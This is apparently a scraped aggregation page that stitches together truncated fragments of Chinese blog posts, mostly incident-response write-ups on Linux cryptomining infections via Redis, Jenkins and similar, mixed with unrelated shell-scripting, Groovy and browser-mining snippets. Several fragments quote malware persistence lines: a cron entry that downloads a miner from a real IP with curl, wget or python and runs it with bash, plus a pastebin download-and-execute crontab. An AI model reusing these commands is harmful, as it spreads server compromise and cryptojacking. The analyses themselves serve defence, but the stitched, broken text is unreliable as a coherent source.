查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄 在/proc/PID/fd里面顺利找到执行脚本...grep -v grep | awk ‘{if(3>=80.0) print nohup /tmp/javax/sshd2 &>>/dev/null & else : fi sleep 60 done 从脚本的删除动作来看...,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现 修复方案 时间短,修复不是我来操作的。...初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。
背景 日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下 样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin...209.141.40.190" fi #写入计划任务: 使用-e参数:激活转义字符 #前三个是吸入系统计划任务 #第四个是写入个人计划任务 #写入计划任务的内容就是以curl、wget、python的urllib2库 来下载挖矿样本到.../tmp/xms,并以bash来执行下载的挖矿样本。...之后再删除下载的挖矿样本/tmp/xms echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c...xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root #放入etc/cron.hourly的脚本会每小时执行一次
ps -eopcpu,args –sort=%cpu|head 找到飙高的程序是minerd
一.简介 本脚本为公司服务器被挖矿,找到的下载矿机的脚本。但看到这么多行,应该是不止是挖矿,还做了别的事情。分析和学习此类脚本,可以防范和解决部分挖矿问题。 二.脚本内容 #!
分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。 进程占CPU 700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。...最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。.../16) 2、通过redis-cli尝试连接Redis并执行预置在.dat文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root,然后通过在Redis中插入数据,将下载执行脚本的动作写入...crontab任务 3、通过脚本实现以上的相关行为,完成植入并启动挖矿程序 4、再编译安装pnscan,继续扫描感染下一个目标 逐渐排查并解决: 5....在redis.conf 中 requirepass XXX 参考脚本:https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool 发布者:全栈程序员栈长,转载请注明出处
事因:阿里突然发短信说我的阿里云服务器上面有挖矿程序!!!!!,顿时一惊,所以登陆到服务器。...1.我用了top命令查看系统目前系统性能 结果发现有个叫-bash的进程占用了99%的资源 2.接下来我用kill -9 21252 然后等一会又发现了这个脚本继续在占用资源,然后百度了下说这个挖矿可能有定时任务.../-bash或者vim — -bash 5.vim — -bash 挖矿里面全是乱码 回头看到 于是 vim run 最后删除udevd文件和run 问题解决 发布者:全栈程序员栈长,转载请注明出处
Linux watchdogs 感染性隐藏挖矿病毒。 网上都在讲watchBog,有什么用,能做什么事,没有特别好的方法去应对变种的挖矿病毒。...我从定时器的地址里面,找出了 python base64 转码的脚本 。解码后,发现了在 shell 脚本中有他们留下的联系方式。...crontab 如下 : 该crontab任务实现从 hxxps://pastebin.com/raw/sByq0rym 下载shell脚本并执行,shell脚本内容为: 使用base64进行转码后..., 可以看到下载执行的脚本文件内容。...经过几天测试,确认了我方感染源为 jenkins ,关闭服务,服务器挖矿病毒终于彻底解除 也有可能会是其他的服务,需要自行确认。
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。...发现攻击者使用的脚本http://104.156.239.160:8080/conn.sh 脚本内容如下: #!...tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片,然后通过dd提取出来挖矿程序...[root@server120 tmp]# file /tmp/conns /tmp/conns: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux...这种通过Redis未授权拿服务器挖矿的情况很常见。 处理过程 1)redis增加认证,清空/var/spool/cron/root和authorized_keys。
序 这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。 背景 这次废话不多说,直接上,背景感觉毫无意义。...update.sh脚本分析 通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析...,通过对脚本进行分析,可以发现该挖矿病毒主要依赖进程和启动项信息,借此可以对该病毒进行清理。...,对应急不熟悉linux系统命令的小伙伴在对病毒清理时,不知道那些是病毒文件,那些正常文件,对此无从下手。...由于在日常生活中,使用桌面操作较多,因此对命令行使用不熟悉,找不到相关文件,因此对linux系统挖矿病毒清理较为恐惧,希望通过对脚本分析这种方式对刚入门的小伙伴有所帮助。
文章目录 中毒特征磁盘cpu 跑满 100% 如何处理 反复发作 中毒特征磁盘cpu 跑满 100% 如何处理 电脑中了挖矿病毒 ps -aux | grep kinsing root 19447
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。...无论kill -9还是直接把系统中nanoWatch所对应的进程文件删除,一样会定时重启。...使用crontab -e查看当前系统的定时任务信息,如下: 显示定时从链接中下载文件,于是在浏览器中访问该地址,下载的文件截图如下: 很明显,这是一个恶意脚本,定时检查下载,并杀掉系统其它部分进程。...(之前安装redis都是在局域网中,现在使用云服务器把密码设置给忘了。。。)...配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中. 3.
Linux中编写Shell脚本 目录 Shell Shell脚本的执行 Shell脚本编写规范 Shell 中的变量 变量的算术运算 双小括号 (()) 数值运算命令的用法 let 运算命令的用法 expr...Shell脚本语言很适合用于处理纯文本型的数据,而Linux系统中几乎所有的配置文件、日志文件,以及绝大对数的启动文件都是纯文本类型的文件。...Shell 脚本的类型 Shell脚本语言是弱类型语言(无须定义变量的类型即可使用),在Unix/Linux中主要有两大类shell: 一类是 Bourne shell ,另一类是 C shell Bourne...1、一个规范的Shell脚本在第一行会指出由哪个程序(解释器)来执行脚本中的内容,这一行内容在Linux bash的编程一般为:#!/bin/bash 或 #!.../bin/bash cd /opt/project/ scrapy crawl xx python3 test.py 相关文章: Linux中sed工具的使用 Linux中grep工具的使用 Linux
Linux清理挖矿程序@bug Linux清理挖矿程序 最近服务器经常被挖矿,一些经验 1....找到挖矿程序 挖矿程序跑起来几乎占满了所有的CPU,以及GPU,用watch -n1 nvidia-smi可以实时看到挖矿程序的PID号,此时不能用kill -9 PID号来进行清除,会发现它换一个PID...使用top可以看到挖矿程序进程名字xxx(command一行),ps aux|grep xxx 或者ls -l /proc/{PID号}/exe 找到病毒程序的路径位置 2.
文章目录 前言 一、Linux 中调用 Groovy 脚本 二、Windows 中调用 Groovy 脚本 前言 在 命令行 , Groovy 脚本 , Groovy 类 , Java 类中 , 可以调用...) 博客为例 , 将 Thread 类的扩展方法定义在 ThreadExt 类中 , 并将其打包封装到 thread.jar 文件中 ; 在 Groovy 脚本中运行 Thread 的扩展文件 , 需要依赖于...thread.jar 文件 ; 一、Linux 中调用 Groovy 脚本 ---- 在 Linux 中运行 Groovy 脚本 , 需要在第一行处配置 #!.../ThreadExtApplication.groovy 命令 , 即可在 Linux 命令行 , 运行 Groovy 脚本 ; 注意 , -classpath 参数的设定 , 指定的 thread.jar...脚本中 , 通过 String[] args 获取执行参数 ; 多个参数之间使用空格隔开 ; .
# java env export JAVA_HOME=/opt/jdk1.8.0_11 # App Info # 应用存放地址 APP_HOME=/cjb...
我相信有很多家伙会从这个新闻以及CoffeeMiner工具中得到启发,利用类似的攻击方式开创挖矿事业。...CoinHive 星巴克挖矿事件中所使用的便是CoinHive挖矿程序。Coinhive是一个提供门罗币挖掘JS脚本的网站平台,攻击者会将其提供的脚本植入到自己或入侵的网站上。...比如注册登陆时候的人机验证,就会启动挖矿程序,等待一段时间的挖矿后才能登录。 根据JavaScript Miner的介绍文档,将事例代码放入网站的html中就可以了,部署极其简单。...根据提示,如果不想有提示用户的弹窗可以将代码中的 authedmine.min.js 替换为 coinhive.min.js。...于是在此框架中,我们会先扫描一下周边热点信息以便后用。
标题:入门 Shell 脚本编程:探索 Linux 中的脚本魔力介绍 Shell 脚本编程是 Linux 系统中的一项强大工具,通过脚本编写可以自动化执行任务、管理系统以及进行复杂的数据处理。...创建脚本文件登录Linux服务器(例如Centos),创建一个脚本文件 my_script.sh2. 添加脚本内容vim my_script.sh# 添加以下内容#!...# 这是一个简单的 Shell 脚本示例:这是一个注释,提供了关于脚本的描述信息。在 Shell 脚本中,以 # 开头的行表示注释,不会被执行。echo "Hello, World!"...运行脚本在命令行中执行以下命令:chmod +x my_script.sh # 添加执行权限....结语 Shell 脚本编程是 Linux 系统中一个强大的工具,能够帮助你自动化任务、管理系统和进行复杂的数据处理。本篇博客只是一个入门,希望能够激发你对 Shell 脚本编程更深入探索的兴趣!
Linux被kdevtmpfsi挖矿病毒入侵 一....错误信息 二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件 三.怎么预防处理这个病毒...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程 删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux...表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除 如下图所示 3.结束kdevtmpfsi进程及端口占用 netstat -antp 找到kdevtmpfsi端口 我这里是28244 一中第三张图可以看到
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/149135.html原文链接:https://javaforall.cn
一、分析 这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。...二、解决 1)在windows下转换: 利用一些编辑器如UltraEdit或EditPlus等工具先将脚本编码转换,再放到Linux中执行。...2)直接在Linux中转换(推荐做法): 首先要确保文件有可执行权限 #sh> chmod a+x filename 1 然后修改文件格式 #sh> vi filename 1 利用如下命令查看文件格式
领取专属 10元无门槛券
手把手带您无忧上云